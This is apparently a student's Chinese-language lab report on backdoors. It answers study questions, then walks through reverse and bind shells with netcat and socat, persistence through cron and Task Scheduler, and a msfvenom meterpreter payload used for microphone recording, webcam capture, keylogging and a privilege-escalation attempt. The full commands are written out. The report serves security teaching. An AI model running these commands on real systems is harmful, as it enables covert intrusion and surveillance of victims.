20155312 張競予 Exp2 後門原理與實踐
Exp2 後門原理與實踐
目錄
- 基礎問題回答
- (1)例舉你能想到的一個後門進入到你系統中的可能方式?
- (2)例舉你知道的後門如何啟動起來(win及linux)的方式?
- (3)Meterpreter有哪些給你映像深刻的功能?
- (4)如何發現自己有系統有沒有被安裝後門?
- 實驗總結與體會
- 實踐過程記錄
- 使用netcat獲取主機操作Shell,cron啟動
- 使用socat獲取主機操作Shell, 任務計劃啟動
- 使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
- 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
基礎問題回答
(1)例舉你能想到的一個後門進入到你系統中的可能方式?
可能是我們點開某個鏈接的時候,自動加載了某個可執行文件,就類似於執行了實驗中傳入到windows中的backdoor.exe;也可能是我們點開某個網頁時,該網頁通過木馬的方式在我們不知情的情況下自動下載了某個後門文件。
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
- linux中可能crontab文件被修改,周期性(定時)反向連接控制主機,只要控制主機保持偵聽狀態,就可以周期性啟動後門,控制被控主機。
- windows中可能是被動下載、接收了後門程序,當被控端點擊運行該程序時,後門便會啟動。
(3)Meterpreter有哪些給你映像深刻的功能?
能夠獲取被控主機的麥克風錄音、獲取被控主機的攝像頭拍照和錄像。
(4)如何發現自己有系統有沒有被安裝後門?
利用防火墻,在防火墻看開啟的端口及對應的進程,一般不是系統默認開啟的端口都是可疑的,要找一下對應的進程,找到對應進程,對相應進程進行抓包,看他通信的數據,分析是不是後門。
定期用360管家等軟件對系統進行檢測,及時處理疑似病毒、木馬的程序。
返回目錄
實踐過程記錄
一、使用netcat獲取主機操作Shell,cron啟動
首先查看WindowsIP和LinuxIP:
- Windows下用命令
ipconfig:
- Linux下用
ifconfig -a
Windows獲得linux的shell:
cron啟動過程如下:
- 先在Windows系統下,監聽8888端口
- 在Kali環境下,用
crontab -e指令編輯一條定時任務,選擇編輯器時選擇"3"; - 在最後一行添加
09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh,意思是在每個小時的第37分鐘反向連接Windows主機的8888端口,設置成37的原因是我當時的時間是11點07,為了能立馬看到效果,所以我將時間設置成了“09”(註意這裏的IP地址應該為控制主機的IP);
4.最後運行結果如下所示:
返回目錄
二、使用socat獲取主機操作Shell, 任務計劃啟動
1.Windows+X,然後選擇“控制面板”(win8下打開控制面板)
2.右上角“查看方式”選擇“大圖標”
3.點擊管理程序->點擊任務計劃程序
4.選擇上方菜單欄中的“操作”->“創建任務”
5.輸入任務名
6.新建觸發器,在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:8888 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe綁定到端口8888,同時把cmd.exe的stderr重定向到stdout上
7.創建完成之後,按Windows+L快捷鍵鎖定計算機,再次打開時,可以發現之前創建的任務已經開始運行
8.socat - tcp:192.168.199.196:8888,這裏的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的8888端口,此時可以發現已經成功獲得了一個cmd shell:(此處的IP地址為WindowsIP)
返回目錄
三、使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
1.在Kali上執行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe,註意這裏的IP地址為控制端IP,即LinuxIP,可見已經生成了後門程序“20155312_backdoor.exe”
2.在Windows下執行ncat.exe -l 8888 > 20155312_backdoor.exe,這樣被控主機就進入了接收文件模式
3.在Linux中執行nc 192.168.199.196 8888 < 20155312_backdoor.exe,註意這裏的IP為被控主機IP,即WindowsIP
4.傳送接收文件成功,如下圖所示:
5.在Kali中打開一個終端,使用msfconsole指令進入msf控制臺
6.接著輸入use exploit/multi/handler使用監聽模塊,設置payload
7.set payload windows/meterpreter/reverse_tcp,使用和生成後門程序時相同的payload
8.set LHOST 192.168.20.136,這裏用的是LinuxIP,和生成後門程序時指定的IP相同
9.set LPORT 8888,同樣要使用相同的端口
10.開始監聽
返回目錄
四、使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
1.使用record_mic指令可以截獲一段音頻:(可以+“-d 時間”來設定錄制時間)
2.使用webcam_snap指令可以使用攝像頭進行拍照:
3.使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
4.先使用getuid指令查看當前用戶,使用getsystem指令進行提權,由於是Win8系統,提權失敗:
5.其他操作:
- 使用screenshot指令可以進行截屏
- 用webcam stream指令可以使用攝像頭進行錄像
- ……
返回目錄
實驗總結與體會
通過本次實驗,我學會了如果對linux和windows植入後門,包括開啟偵聽、反向連接、生成後門程序、傳送後門程序、控制被控主機、修改定時任務列表、使用socat獲取主機操作Shell等。在動手實驗的過程中既體會到了作為攻擊者的樂趣,更加深刻的體會到了使用計算機時增強安全意識的重要性。平時上網的時候,一定要註意不點擊不靠譜鏈接,下載軟件時盡量選擇官網下載,防止下載盜版軟件時被捆綁下載其他後門程序。
返回目錄
20155312 張競予 Exp2 後門原理與實踐